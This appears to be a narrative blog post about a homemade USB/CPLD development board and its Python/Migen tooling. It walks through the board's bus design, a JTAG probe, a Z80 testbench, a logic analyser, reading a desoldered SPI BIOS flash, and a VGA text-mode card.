Imposing such kind of interface also meant imposing a huge, redundant and overblown part of HDL code only to ensure the glue logic between the core logic of the module and the rest of the design. This was where meta-programming became appropriated.
A python module called bmii had been developed to extend the structures provided by Migen. For instance, an extension of the ‘Module’ objects was included in this library to add all facilities needed to generate the intended glue logic.
from bmii import * iom = IOModule("pwm")
This object contained the
cregs
special attribute which was used to manage the control registers of theIOModule
.CtrlReg
was charged to construct a special 8-bit width Migen’sSignal
which embedded extra information needed to build the control registers network. The direction of such register had to be manually specified during instantiation. It could be:RDONLY
: Only readable from the host. The signal had to be driven by the internal logic of theIOModule
.WRONLY
: The signal could only be latched from the host but could not read it back. This direction was useful to suggest the toolchain to synthesise this signal as awire
instead of a verilog’sreg
.RDWR
: The signal could be read and written from the host. Synthesis of this kind of signal would likely result to verilog’sreg
.
For the PWM
IOModule
, only the pulse’sWIDTH
and theCOUNTER
signals had to be accessed from the host.iom.cregs += CtrlReg("WIDTH", CtrlRegDir.RDWR) iom.cregs += CtrlReg("COUNTER", CtrlRegDir.RDONLY)
In the same way,
iosignals
attribute handled the signals intended to be mapped to physical pins. AnIOSignal
always correspond to a 1-bit width signal. The direction of anIOSignal
was also needed to be explicitly specified.OUT
: Signal driven by theIOModule
.IN
: Signal driven by an external component and read by theIOModule
’s logic.DIRCTL
: Signal driven by theIOModule
and used to control the tri-state buffer of a pin.
The PWM only used two outputs:
iom.iosignals += IOSignal("OUT", IOSignalDir.OUT) iom.iosignals += IOSignal("NOUT", IOSignalDir.OUT)
Finally, the internal logic could be described by using Migen’s special attributes:
iom.sync += iom.cregs.COUNTER.eq(iom.cregs.COUNTER + 1) iom.comb += iom.iosignals.OUT.eq(iom.cregs.COUNTER < iom.cregs.WIDTH) iom.comb += iom.iosignals.NOUT.eq(~iom.iosignals.OUT)
Section II: An Iron Hand In A Velvet Glove
The concept of control register was illustrated and justified. Their aim was then to think about how to make them accessible from the host by using USB.
Concretely, this step meant defining a unit that would be able to translate GPIF waveforms to a more convenient protocol to drive the internal bus. This unit had been called ‘Northbridge’.
The internal bus had been defined as follow:
MOSI[0:7]
andMISO[0:7]
represented the both directions of the data bus.WR
distinguished a read or a write operation.MADDR[0:2]
andRADDR[0:4]
were used to generate the chip select signal for a module and a control register respectively.REQ
informed the control register that an operation was going to be performed.
The issue here was related to the fact that the GPIF data bus had exactly the same width that a control register. This meant that the addressing and the read/write operations on the internal bus could not be achieved in a single clock tick.
From the GPIF point of view, performing an operation on the internal bus meant sending the module/control register address (latched by the Northbridge) before proceeding to the actual read/write operation.
The northbridge managed the GPIF’s control signals as follow:
CTL0
andCTL1
were basically forwarded to theREQ
andWR
signals of internal bus respectively.CTL2
was used to indicate that the USB controller was latching an address and that the current operation must not be considered as a regular write operation.
The northbridge was polling for operation by checking the value of the
CTL0
signal when clocking the interface clock.In addition of containing a value, control registers were generated with extra signals used to represent the operation currently performed on it and then facilitated their usage from the internal logic.
The
wr
andrd
signals indicated that the control register was selected and that a write or read operation respectively was going to be performed. These signals were asserted during several clock ticks as they were directly forwarded by the northbridge from the GPIF. So to facilitate the use of them in a synchronous circuit,wr_pulse
andrd_pulse
were derived from the previous signals. By using a ‘level to pulse’ state machine,wr_pulse
were implemented to be asserted during exactly one clock tick when the write operation was completed and then indicated to the internal logic that a valid value was available in the register. In a meantime,rd_pulse
pulsed the beginning of the read operation to inform theIOModule
that the control register was going to be read and then gave it time to feed a correct value before the next falling edge ofrd
signal, moment when its value was actually captured by the northbridge.At that point, any control register could be accessed from the host using the correct USB request. In order to make the usage of the USB easier from the host point of view, an additional interface had been introduced: the
BMIIModule
.A python object of this type contained two special attributes: the first one was the
IOModule
which represented the RTL design while the second was called the driver of theBMIIModule
. Automatically created, thedrv
attribute was able to inspect theIOModule
to generate the correct USB request according to the information specified in the RTL about the control registers addresses and directions.pwm = BMIIModule(iom)
To finalize the generation of the IO controller design, the
BMII
object acted as a top-level representation of the whole design of the board. It must be informed that a new module had to be added by using itsadd_module
method.A call to this procedure meant connecting the
IOModule
to the internal bus, allocating module and control registers addresses.b = BMII() b.add_module(pwm)
Once the CPLD configured, the host could easily accessed the control registers by simply setting the attributes of the
drv
aliased with the control registers names:pwm.drv.WIDTH = 42 cnt = int(pwm.drv.COUNTER)
Section III: The Signal Goes South
In the same way the northbridge managed the communication with the external USB controller, a other dedicated unit had been defined to handle the multiplexing of the
IOSignals
to physical IO pins. Obviously called thesouthbridge
, it was implemented as a specialIOModule
which had noIOSignals
and was only charged to manage the signals coming from other modules. For each physical pin, the southbridge was charged to generate the following circuit:Each pin was considered bidirectional and the direction could be configured with an
IOSignal
defined as such. An unlimited number of signals could read the value of a pin while only one could drive it.To inform the southbridge that an
IOSignal
had to be connected to a pin, assignment topins
attribute of this unit had to be performed as follow:b.ioctl.sb.pins.LED0 += pwm.iomodule.iosignals.OUT
The direction declared during the definition of the
IOSignal
were used to determine where the signal had to be connected on the pin multiplexing circuit.As the southbridge was considered as a regular
IOModule
, it was connected to the internal bus and then exposed its own control registers. This opportunity was leveraged to make the pins controllable from host bypassing the need of defining a specificIOModule
when a simple operation had to be performed on the IOs.PINDIR
,PINDIRMUX
,PINOUT
,PINMUX
andPINSCAN
signals of each pin were accessible using southbridge’s control registers. For instance, making the LED blinked could be commanded by:b.modules.southbridge.drv.PINMUXMISC.LED1 = 1 # Make the southbridge drive the LED0 pin b.modules.southbridge.drv.PINOUTMISC.LED1 = \ int(b.modules.southbridge.drv.PINSCANMISC.LED1) ^ 1 # Toggle the LED0 pin
For the example design previously defined, a complete mapping of the internal bus’s address space looked as follow:
b.list_modules() -- 0x0: northbridge 0x0: IDCODE (CtrlRegDir.RDONLY) 0x1: SCRATCH (CtrlRegDir.RDWR) 0x1: southbridge 0x0: PINDIR1L (CtrlRegDir.RDWR) 0x1: PINDIR1H (CtrlRegDir.RDWR) 0x2: PINDIR2L (CtrlRegDir.RDWR) 0x3: PINDIR2H (CtrlRegDir.RDWR) 0x4: PINSCAN1L (CtrlRegDir.RDONLY) 0x5: PINSCAN1H (CtrlRegDir.RDONLY) 0x6: PINSCAN2L (CtrlRegDir.RDONLY) 0x7: PINSCAN2H (CtrlRegDir.RDONLY) 0x8: PINSCANMISC (CtrlRegDir.RDONLY) 0x9: PINMUX1L (CtrlRegDir.RDWR) 0xa: PINMUX1H (CtrlRegDir.RDWR) 0xb: PINMUX2L (CtrlRegDir.RDWR) 0xc: PINMUX2H (CtrlRegDir.RDWR) 0xd: PINDIRMUX1L (CtrlRegDir.RDWR) 0xe: PINDIRMUX1H (CtrlRegDir.RDWR) 0xf: PINDIRMUX2L (CtrlRegDir.RDWR) 0x10: PINDIRMUX2H (CtrlRegDir.RDWR) 0x11: PINMUXMISC (CtrlRegDir.RDWR) 0x12: PINOUT1L (CtrlRegDir.RDWR) 0x13: PINOUT1H (CtrlRegDir.RDWR) 0x14: PINOUT2L (CtrlRegDir.RDWR) 0x15: PINOUT2H (CtrlRegDir.RDWR) 0x16: PINOUTMISC (CtrlRegDir.RDWR) 0x2: PWM 0x0: WIDTH (CtrlRegDir.RDWR) 0x1: COUNTER (CtrlRegDir.RDONLY)
The northbridge used two control registers defined for testing purposes only. The
IDCODE
contained a magic number read by the USB controller to verify the validity of the CPLD’s configuration while theSCRATCH
register was used to test write operations on the bus.To sum up, the following architecture had been defined as the basis for further improvements:
Section IV: An Autarchical Sequence
As this architecture was mainly based on the flexibility provided by the CPLD, one issue still remained before becoming truly usable: the compiling and programming sequences of a BMII’s design had to stay self-contained and to avoid the need of external hardware tools.
The building sequence aimed to produce the binary blob of the USB firmware as well as the bitstream of the IO controller. For the FX2LP, a ninja build file was generated to proceed to the compiling of the custom firmware using sdcc.
Concerning the IO controller, the verilog generation was left to Migen while the building of the bitstream was ensured by Quartus.
b.build_all()
The programming sequence was a bit more tricky. A first and trivial way to achieve this was to use a USB Blaster JTAG probe to configure the CPLD with the desired bitstream. In order to be self-programmed, the CPLD’s JTAG signals had been connected to a tri-state buffer in addition to the regular 10-pin JTAG header. Ensured by a standard 74244, this buffer was driven by the USB controller. The goal of this circuit was to give the ability to communicate with the CPLD via JTAG when the
JTAGE
was asserted.To be able to reuse Quartus Programmer software to program the CPLD, the open-source implementation of the USB Blaster protocol for FX2LP (ixo.de USB JTAG) had been adapted to match the wiring of their circuit.
b.program_all()
The programming sequence could be summarize as follow:
- The first step was to load the custom USB Blaster firmware into the USB controller using fxload.
- If a JTAG IDCODE scan was successful, the bitstream was uploaded using Quartus Programmer.
- To be able to write their own FX2LP firmware to the EEPROM, a second stage firmware loader was programmed in the chip. It added a new USB vendor command allowing writing operations on the I2C bus.
- Finally, the regular firmware was loaded in the USB controller.
Chapter III: The Fellowship Of The Joint Test
As a first application of there board, the second tinkerer proposed to implement a full-featured JTAG probe that anyone could use as an alternative to Flyswatter, Bus Blaster or any other cheap JTAG probe.
The JTAG defines an electrical standard for on-chip instrumentation by using a dedicated debug port implementing a serial communication interface. This protocol was well-defined and simple enough to be used as a comprehensive example.
The third one replied that demonstrating the usefulness of their project by trying to mimic other well-known and mature JTAG probes was a waste of time since reaching comparable performance would required more effort that he could imagine at the time.
The first tinkerer mitigated that argument by pointing the fact that no cheap JTAG probe was generic enough to be compatible with a very wide range of platforms and very few of them were designed to be used in contexts other than just CPU’s on-chip debugging. He agreed and started to think about a possible implementation of such protocol using their project.
Section I: The Bridge Of Shockley
Even though the JTAG standard was quite strict about the communication logic, the electrical characteristics of the signals were left to the target device. This meant that the probe had the responsibility to drive them with the target voltage.
Assuming that the main board was only able to drive 3.3V IOs, expanding it with the needed interface was required.
A first version had been implemented using voltage level shifters and worked well with some mainstream devices. However, some platforms from specific manufacturers pull-up JTAG signals with very low resistors, which forced the probe to drive more current than most of the voltage level shifters could supply.
As a quick fix, the expansion board had been equipped with bipolar junction transistors for output signals.
In a more generic way, they though that being forced to design expansion board to electrically convert signals from the main board to the driven target was not a big deal. Main board’s IO could simply not be electrically universal.
Section II: The Self-Surgery
For a naive implementation of JTAG protocol, the
IOModule
consisted of simply connecting theTMS
andTDI
outputs to a write-only control register while wiring theTCK
to itswr_pulse
signal. In this configuration, each JTAG clock tick was triggered by writing to this control register.Each devices on a JTAG’s daisy chain communicated via a Test Access Port. This hardware unit implemented a stateful protocol to expose its debug facilities. As it was possible to make all of them converged to a reset and stable state, it was easy to walk though this state machine by keeping all TAPs synchronized.
Assuming this, a unique state machine was implemented in the
IOModule
to keep the track of the current TAP state. A control register had been allocated to allow the host to check this state when needed.Devices responded to JTAG scans with the
TDO
signal. The FIFO block was used to buffer received data before being read by the host thought a read-only register. This case perfectly demonstrated the usage of therd_pulse
signal since it was used to dequeue the next value of the FIFO submodule.Although most platforms’s JTAG daisy chain were short and fixed, some of them could dynamically append TAP to the chain, making the usage of general purpose JTAG tools unusable. To describe this kind of situation, facilities had been implemented to describe a dynamic TAP network.
from bmii.modules.jtag import JTAG, TAP, DR
A
JTAG
object extended a regularBMIIModule
to abstract the low-level operations to the JTAG’sIOModule
.TAP
andDR
were provided to describe the current layout of the TAP network. For instance, describing the Max V’s JTAG would look like this:class AlteraMaxVJTAG(JTAG): def __init__(self): JTAG.__init__(self) tap = TAP("CPLDTAP", 10) # 10-bit instrwuction register # name instr. reg. length tap += DR("SAMPLE/PRELOAD", 0b0000000101, 480) tap += DR("EXTEST", 0b0000001111, 480) tap += DR("BYPASS", 0b1111111111, 1) tap += DR("USERCODE", 0b0000000111, 32) tap += DR("IDCODE", 0b0000000110, 32) tap += DR("HIGHZ", 0b0000001011, 1) tap += DR("CLAMP", 0b0000001010, 32) tap += DR("USER0", 0b0000001100, 32) tap += DR("USER1", 0b0000001110, 32) self.add_tap(tap) @classmethodw def default(cls, bmii): jtag = cls() bmii.add_module(jtag) bmii.ioctl.sb.pins.IO10 += jtag.iomodule.iosignals.TMS bmii.ioctl.sb.pins.IO11 += jtag.iomodule.iosignals.TCK bmii.ioctl.sb.pins.IO12 += jtag.iomodule.iosignals.TRST bmii.ioctl.sb.pins.IO13 += jtag.iomodule.iosignals.TDI bmii.ioctl.sb.pins.IO21 += jtag.iomodule.iosignals.TDO return jtag
According to that description, scanning the
IDCODE
of the device could be simply done by:b = BMII() jtag = AlteraMaxVJTAG.default(b) jtag.reset() jtag.irdrscan("CPLDTAP", "IDCODE")
A possible improvement for this would be to generate this tap network directly from the BSDL files of daisy chained devices. The usage of BJT to drive JTAG signals was also a very quick and easy response to the low pull-up resistance problem. The third tinkerer complained that many other solutions could be implemented there as the BJT had a very long switching time and then forced to drive signals at 12MHz when many targets supported to be clocked up to 100MHz in their debug port.
Chapter IV: And In Darkness Bind Them
Sceptical about the results of the first application, the third tinkerer thought about a niche application that only few people would actually need. Enthusiastic but upset by the pragmatism of the two other, he left the group to develop his idea by his own.
For him, a second purpose for this board was purely and simply to act as a test bench for analysing black-boxed devices. To demonstrate his idea, he chose the first device he could found on his drawer: a Z80 packaged in a DIP-40.
Primary sold by Zilog as an improved Intel 8080, it had become a very popular processor for simple embedded applications since it was truly easy to make this chip working with a custom circuit. This device was then the perfect guinea pig for his experiences.
Section I: The Calm Before The Storm
Before trying to blow up the chip, defining the RTL needed to correctly drive the CPU was necessary.
iom = IOModule("Z80TB")
The DIP-40 version of this CPU exposed a 16-bit address bus and a 8-bit data bus. As the last one was bidirectional, three different
IOSignals
had to be defined:DIN
,DOUT
andDDIR
. In order to keep the main board and the device under test synchronized, the CPU’s clock was managed by theIOModule
. All other required control signals were defined asIOSignals
.ADDRESS_WIDTH = 14 # Truncated, actually 16. DATA_WIDTH = 8 iom.iosignals += IOSignal("CLK", IOSignalDir.OUT) iom.iosignals += IOSignal("_M1", IOSignalDir.IN) iom.iosignals += IOSignal("_MREQ", IOSignalDir.IN) iom.iosignals += IOSignal("_IOREQ", IOSignalDir.IN) iom.iosignals += IOSignal("_RD", IOSignalDir.IN) iom.iosignals += IOSignal("_WR", IOSignalDir.IN) iom.iosignals += IOSignal("_WAIT", IOSignalDir.OUT) iom.iosignals += IOSignal("_HALT", IOSignalDir.IN) iom.iosignals += IOSignal("_RESET", IOSignalDir.OUT) iom.iosignals += IOSignal("_RFSH", IOSignalDir.IN) for i in range(ADDRESS_WIDTH): iom.iosignals += IOSignal("A{}".format(i), IOSignalDir.IN) oe = Signal() for i in range(DATA_WIDTH): iom.iosignals += IOSignal("DIN{}".format(i), IOSignalDir.IN) iom.iosignals += IOSignal("DOUT{}".format(i), IOSignalDir.OUT) iom.iosignals += IOSignal("DDIR{}".format(i), IOSignalDir.DIRCTL) iom.comb += getattr(iom.iosignals,"DDIR{}".format(i)).eq(oe)
From the host point of view, the only reasonable access points was the information about the state of the CPU, the address it was accessing and the data it transferred.
iom.cregs += CtrlReg("STATE", CtrlRegDir.RDONLY) iom.cregs += CtrlReg("DIN", CtrlRegDir.RDONLY) for i in range(DATA_WIDTH): iom.comb += iom.cregs.DIN[i].eq(getattr(iom.iosignals, "DIN{}".format(i))) iom.cregs += CtrlReg("DOUT", CtrlRegDir.WRONLY) for i in range(DATA_WIDTH): iom.comb += getattr(iom.iosignals, "DOUT{}".format(i)).eq(iom.cregs.DOUT[i]) iom.cregs += CtrlReg("ADDRL", CtrlRegDir.RDONLY) iom.cregs += CtrlReg("ADDRH", CtrlRegDir.RDONLY) for i in range(ADDRESS_WIDTH): if i < 8: addr = iom.cregs.ADDRL else: addr = iom.cregs.ADDRH iom.comb += addr[i % 8].eq(getattr(iom.iosignals, "A{}".format(i)))
A special control register had been added to perform special control operations on the CPU. It was mainly used to manually control the
RESET
signal forcing the reset of the chip from any CPU state.iom.cregs += CtrlReg("CTL", CtrlRegDir.RDWR) iom.cregs.CTL[0] = "RESET" iom.comb += iom.iosignals._RESET.eq(~iom.cregs.CTL.RESET)
The clock signal of the Z80 had been fixed to half the frequency of the system clock. Due to clocking requirement of the chip, this signal was fixed to 8MHz.
iom.sync += iom.iosignals.CLK.eq(~iom.iosignals.CLK)
Requests from the Z80 CPU followed 3 stages. When it was not halted, the testbench entered an
IDLE
state. During this one, the CPU was still performing operations internally but did not request any external resources.The second stage followed a request detection. The goal here was to freeze the CPU execution until the host provided an instruction to the testbench about how to handle the request.
Finally, the last stage meant actually responding to CPU’s request according to host instructions.
from enum import IntEnum class Z80State(IntEnum): UNKNOWN = 0b00000000 IDLE = 0b00000001 FETCH = 0b00000010 MEMRD = 0b00000100 MEMWR = 0b00001000 IORD = 0b00010000 IOWR = 0b00100000 HALTED = 0b01000000
To implement this state machine in the RTL, Migen provided a facilities to define FSM in its generic library:
from migen.genlib fsm = FSM() iom.submodules += fsm
According to Z80 waveforms, the request for bus access was asserted using
_MREQ
or_IOREQ
. During the request initiation,_RD
,_WR
and address bus are driven and valid.When living the
IDLE
state, the testbench could determined what kind of request was going to be performed and could notified the host about that.fsm.act("IDLE", iom.cregs.STATE.eq(Z80State.IDLE), If(~iom.iosignals._HALT, NextState("HALTED")).\ Else( If(~iom.iosignals._MREQ & iom.iosignals._RFSH, If(~iom.iosignals._RD, If(~iom.iosignals._M1, NextState("FETCH")).\ Else(NextState("MEMRD"))).\ Elif(~iom.iosignals._WR, NextState("MEMWR"))).\ Elif(~iom.iosignals._IOREQ, If(~iom.iosignals._WR, NextState("IOWR")).\ Elif(~iom.iosignals._RD, NextState("IORD"))))) fsm.act("HALTED", iom.cregs.STATE.eq(Z80State.HALTED), If(iom.iosignals._HALT, NextState("IDLE")))
While waiting for an answer from the host, the trick here was to assert the
_WAIT
input of the CPU in order to notify it that bus cycle could not be completed at that moment. This left enough time for the host to communicate its desired operation. To finalize a write operation, the host just had to read from theWRITE
register. Completed a read operation was performed by writing toREAD
control register.bus_access = Signal() iom.comb += iom.iosignals._WAIT.eq(~bus_access) def goto_rd(): return If(iom.cregs.DOUT.wr_pulse, NextState("READ")) def goto_wr(): return If(iom.cregs.DIN.rd_pulse, NextState("WRITE")) fsm.act("FETCH", iom.cregs.STATE.eq(Z80State.FETCH), bus_access.eq(1), goto_rd()) fsm.act("MEMRD", iom.cregs.STATE.eq(Z80State.MEMRD), bus_access.eq(1), goto_rd()) fsm.act("MEMWR", iom.cregs.STATE.eq(Z80State.MEMWR), bus_access.eq(1), goto_wr()) fsm.act("IORD", iom.cregs.STATE.eq(Z80State.IORD), bus_access.eq(1), goto_rd()) fsm.act("IOWR", iom.cregs.STATE.eq(Z80State.IOWR), bus_access.eq(1), goto_wr())
To finally complete the bus cycle after intervention from the host, the data bus just had to be driven in the corresponding direction:
def goto_idle(): return If(iom.iosignals._MREQ & iom.iosignals._IOREQ, NextState("IDLE")) fsm.act("READ", iom.cregs.STATE.eq(Z80State.IDLE), oe.eq(1), goto_idle()) fsm.act("WRITE", iom.cregs.STATE.eq(Z80State.IDLE), goto_idle())
Section II: The Gates Open
Once the testbench logic defined, the
BMIIModule
could then be integrated to a finalBMII
design:z80tb = BMIIModule(iom) b = BMII() b.add_module(z80tb)
The actual wiring to the tested Z80 looked as follow. Due to the lake of physical IO pins on the main board, the two last pins of the address bus had been ignored.
The southbridge had to be informed to this configuration. Any changes on the physical circuit only implied rerouting of the testbench’s
IOModule
on the southbridge unit:b.ioctl.sb.pins.IO28 += iom.iosignals._RESET b.ioctl.sb.pins.IO29 += iom.iosignals._WAIT b.ioctl.sb.pins.IO2A += iom.iosignals.CLK b.ioctl.sb.pins.IO2B += iom.iosignals._M1 b.ioctl.sb.pins.IO2C += iom.iosignals._MREQ b.ioctl.sb.pins.IO2D += iom.iosignals._IOREQ b.ioctl.sb.pins.IO2E += iom.iosignals._RD b.ioctl.sb.pins.IO2F += iom.iosignals._WR b.ioctl.sb.pins.IO1F += iom.iosignals._HALT b.ioctl.sb.pins.IO1E += iom.iosignals._RFSH for i in range(ADDRESS_WIDTH): pin = getattr(b.ioctl.sb.pins, "IO1{}".format(hex(i)[2:].upper())) pin += getattr(iom.iosignals, "A{}".format(i)) for i in range(DATA_WIDTH): pin = getattr(b.ioctl.sb.pins, "IO2{}".format(i)) pin += getattr(iom.iosignals, "DIN{}".format(i)) pin += getattr(iom.iosignals, "DOUT{}".format(i)) pin += getattr(iom.iosignals, "DDIR{}".format(i))
Section III: La Grande Illusion
As the IO controller design was completed, the host driver had to be completed in order to define the exact behaviour of the testbench.
For this example, the goal was to be able to execute a very short piece of code on the connected Z80. The content of the main memory had been defined as:
def ld_hl_nn(nn): return [0x2A, nn & 0xFF, (nn >> 8) & 0xFF] def ld_b_n(n): return [0x06, n] def ld_c_n(n): return [0x0E, n] def otir(): return [0xED, 0xB3] def halt(): return [0x76] from itertools import chain, islice, repeat s = "LSE" instrs = chain( # Instructions ld_hl_nn(0x000A), # 0000 - Load string address ld_b_n(len(s)), # 0003 - Load string length ld_c_n(0), # 0005 - Set IO port address otir(), # 0007 - Output the string halt(), # 0009 - Halt the CPU # Data [0x0C, 0x00], # 000A - String address [ord(c) for c in s], # 000C - String content # Padding repeat(halt()) # Fill the rest of the memory # with HALT instruction ) mem = list(islice(instrs, 256))
The only job of the host was to poll the
STATUS
register and to reply by reading from theDIN
control register or by writing toDOUT
according to the CPU’s request.recvbuff = "" # Reset the CPU by pulsing the _RESET signal z80tb.drv.CTL.RESET = 1 z80tb.drv.CTL.RESET = 0 while True: state = int(z80tb.drv.STATE) print("{} \t-- Addr: {:04x}".format(str(Z80State(state)), (int(z80tb.drv.ADDRH) << 8) | int(z80tb.drv.ADDRL)), end='') # Emulate main memory reading if (state in [Z80State.FETCH, Z80State.MEMRD]): z80tb.drv.DOUT = mem[int(z80tb.drv.ADDRL)] # Emulate main memory writing elif (state == Z80State.MEMWR): mem[int(z80tb.drv.ADDRL)] = int(z80tb.drv.DIN) # Emulate reading from device elif (state == Z80State.IORD): z80tb.drv.DOUT = 0xFF # Emulate writing to device elif (state == Z80State.IOWR): data = int(z80tb.drv.DIN) recvbuff += chr(data) print(" | Data: {:02x} ({})".format(data, chr(data)), end='') # Stop main loop when CPU reaches the halt state elif (state == Z80State.HALTED): break print() print("Received string: [{}]".format(recvbuff)) -- Z80State.FETCH -- Addr: 0000 Z80State.MEMRD -- Addr: 0001 Z80State.MEMRD -- Addr: 0002 Z80State.MEMRD -- Addr: 000a Z80State.MEMRD -- Addr: 000b Z80State.FETCH -- Addr: 0003 Z80State.MEMRD -- Addr: 0004 Z80State.FETCH -- Addr: 0005 Z80State.MEMRD -- Addr: 0006 Z80State.FETCH -- Addr: 0007 Z80State.FETCH -- Addr: 0008 Z80State.MEMRD -- Addr: 000c Z80State.IOWR -- Addr: 0200 | Data: 4c (L) Z80State.FETCH -- Addr: 0007 Z80State.FETCH -- Addr: 0008 Z80State.MEMRD -- Addr: 000d Z80State.IOWR -- Addr: 0100 | Data: 53 (S) Z80State.FETCH -- Addr: 0007 Z80State.FETCH -- Addr: 0008 Z80State.MEMRD -- Addr: 000e Z80State.IOWR -- Addr: 0000 | Data: 45 (E) Z80State.FETCH -- Addr: 0009 Z80State.HALTED -- Addr: 001f Received string: [LSE]
Chapter V: The Feebleness Appears
In a meantime, the two other tinkerers were focussed on testing the main board on some more pragmatic scenarios in order to check its limitations with the hope to serve a real purpose.
Section I: The Relativity of Space…
Their experience with the implementation of a JTAG module were marked by the difficulty to debug and trace the state of the digital design. As the northbridge and the internal bus logic were considered reliable enough, they decided to implement an
IOModule
exclusively designed to probe any other signals of the IO controller design.Acting as an internal logic analyser, a probing circuit composed of one control register fed by a FIFO was generated for each probed signals.
The capture was triggered by a special configurable signal and could be reset by the host at any moment.
As an example, the following design made the main board to act as a very cheap logic analyzer where all IO signals were simultaneously probed. The trigger was wired to the physical switch input:
b = BMII() la = LogicAnalyzer(4) # Probing FIFO of 4 elements b.add_module(la) sb = b.modules.southbridge.iomodule # Probe name Width Signal la.probe("IO1L", 8, sb.cregs.PINSCAN1L) la.probe("IO1H", 8, sb.cregs.PINSCAN1H) la.probe("IO2L", 8, sb.cregs.PINSCAN2L) la.probe("IO2H", 8, sb.cregs.PINSCAN2H) la.probe("IOMISC", 8, sb.cregs.PINSCANMISC) la.set_trigger(~sb.cregs.PINSCANMISC.SW)
In parallel of that, an implementation of a master SPI module was in development. It was a perfect test case for the logic analyzer as it was not yet tested on a real SPI slave.
from bmii.modules.spi import SPIMaster from bmii.modules.spidev import SerialFlash b = BMII.default() spi = SPIMaster.default(b) la.probe("SCLK", 1, spi.iomodule.iosignals.SCLK) la.probe("SS0", 1, spi.iomodule.iosignals.SS0) la.probe("MOSI", 1, spi.iomodule.iosignals.MOSI) la.set_trigger(spi.iomodule.cregs.TX.wr_pulse)
The SPI module initiated a transaction when its
TX
register was written. Itswr_pulse
was then used to define the trigger of the logic analyzer as the goal was to analyse the output signal during an SPI activity.The
capture
method of a logic analyzer object waited for a capture be completed and then dequeued the samples by reading the control register of each probe.la.reset() spi.select_slave(0) spi.tranceive(42) la.capture() la.show()
Finally, the
show
method could be used to generate the captured waveforms to a VCD file and to display it using gtkwave:However, each probe circuit was significantly logicblock-consuming which limited the use of tiny FIFO making the logic analyser useless on complex circuit.
Section II: …And Time
After this first disappointment related to the quite limited space provided by the CPLD, they pursue their work on the SPI module by implementing required operations to drive a JEDEC-compliant serial flash memory.
sf = SerialFlash.default(b, spi, slave_id=0) sf.read_id() -- Manufacturer ID: 0xC2 (Macronix) Memory Type: 0x20 Memory Capacity: 0x15 (16Mb)
Driving the SPI flash was actually quite easy when it was previously extracted from its original circuit. This one was desoldered from a PC motherboard:
sf.dump(0x1FE000, size=25) b'Award BootBlock BIOS v1.0'
The real challenge could be to probe the SPI packet in a passive way. This implied to base the
IOModule
logic on the SPI clock imposed by an external device instead of the regular system clock. Even though all this logic had been implemented and tested on simple devices, it was still returning malformed data when used on a PC motherboard since the BIOS flash was clocked at a frequency higher than 40MHz.Their guess for the reason of this issue was based on the fact that no IO pins were connected to a clock input of the CPLD. This meant that the SPI clock was gated by a regular IO input not designed to support such high frequency.
Chapter VI: Displayed As Of Yore
Affected by these previous failures, the two first tinkerers doubted about the real efficiency of the current hardware design of their board. By curiosity and driven by their discouragement, they look for the third one, probably lost in his solo projects.
They found him in its basement, soldering wires and axial resistors to a VGA connector. He explained that he was oddly trying to make the main board acting as a video card. That was a plain useless job but he was glad to do it. Bored, the two other tried to helped him to finish and agreed that it would be their last experience with their board.
Section I: The Dilemma Of Etching Copper
Although driving VGA signals was something quite simple, they estimated that creating a dedicated expansion board would make their job easier. Firstly, it would allow the mechanical integration of a decent VGA connector. Secondly, it was a good opportunity to add some extra memories to the board as the CPLD would not be able to store enough data needed to implement a video card. A standard 128KB static RAM packaged in a SSOP package has been chosen due to to its simple interface and its fast respond time.
The VGA’s RGB pins must be driven by analog signals which implied the use of Digital to Analog Converters to be controlled from the CPLD. As these signals were defined to be ground terminated by a 75 Ohm resistor on the monitor side, a cheap equivalent of a DAC could be obtained by connecting different resistors to several CPLD’s outputs, connected in parallel and acting as a voltage divider with monitor’s termination resistor (see
R1
toR6
).By allocating 6 outputs for driving RGB signals, 64 colors could be generated. However, the limited number of IO pins prevented the usage of all of the 17-pin SRAM’s address bus in the same time that the 6 pins of the RGB signals.
In order to postpone this design decision, jumpers had been added to the extension PCB to allow the configuration at soldering-time. The first setting allowed the usage of 8 colors with a 256KB video RAM while the second one constrained the use of a 16KB RAM but could drive 64 colors (see table at the bottom layer of the PCB).
Section II: A Proselytized Static Memory
On a regular video card, framebuffer was supposed to be stored on a dual-port RAM in order to allow the controller to write displayed frame in the same time that it was read by the signal generator. As this kind of device must be controlled by a large number of pin, a regular SRAM had been used to substitute a real VRAM.
Of course, this tweak forced a tighter management of the VRAM as two independents actors were using it at the same time while providing a unique interface.
From a high-level point of view the simple video card could be represented as an
IOModule
by following this architecture:To manage the VRAM, the trick was to exploit the fact that the pixel clock required to display with a resolution of 640x480 at 60Hz was fixed to 25.175 MHz. As the IO controller was clocked at 48MHz, odd ticks were used to read from VRAM and to drive the pixel clock at 24Mhz which was acceptable for most of the recent VGA monitors. Meanwhile, even ticks where used to perform the write operations on the VRAM. To ensure that writing operations were successful, the read operation that followed a writing was cancelled which was not critical most of the time but could led to small display glitches
The VRAM management unit could be described with the following state-machine:
- 1: If a write operation has to be performed, then, drive the data and the address bus. Else, drive the address bus for the next reading.
- 2: Reading state: Capture the output of the VRAM
- 3: Writing state: Indicate to the VRAM that the data bus is ready to be read for a memory writing.
Section III: Words Engraved In A Black Screen
As the VRAM management core logic and the VGA signal generation was correctly working, only the logic needed to drive the read from the VRAM and to drive RGB signals according to VRAM’s data had to be adapted to modify the displaying.
To demonstrate how the VRAM could be managed, a simple text mode had been implemented.
VRAM had been organized as follow:
0x0000
- Text framebuffer: as the VGA-compatible text mode implemented on PC platforms, each characters consisted of one byte for the ASCII code and a second contained the color.0x0700
- Character set (3KB): Sprites representing each character. A font similar to the IBM’s code page 437 was used.
As only one reading on the VRAM was possible per pixel clock tick, reading sequence had to be aligned to the character display. While the three last pixels of a character, the VRAM reading logic fetched the ASCII code and the color of the next character on the framebuffer and provided to the display logic the corresponding sprite’s row from the character set.
Epilogue
Surprisingly, the two first tinkerers found unexpected satisfaction to complete this dumb video card. The result of this last experience reflected the childish feelings that pushed them to start their first board: a satisfying design serving a useless objective.
This forced step-back helped them to highlight the items that could improve the next version of the board, if someone would be brave enough to go on on their footsteps. The lack of logic blocks could be easily solved by switching to an FPGA. A lot of decent ones were still available in 144-pin EQFP packages. Allocating pins to an external RAM would also not be a waste. Many other applications were blocked by the lack of an embedded and easy to use memory.
Concerning the timing issues encountered while probing the SPI flash, simply mapping some clock inputs to physical headers would be enough to unscramble most of them.
After that, the tinkerers team split up. Each of them had been aligned to the ‘state-of-art’-ish folk and they finally scattered, where engineers dwell…
References
Sources
Datasheets
-
LSE Week 2016: Schedule
Our schedule for the LSE Week 2016 is out !
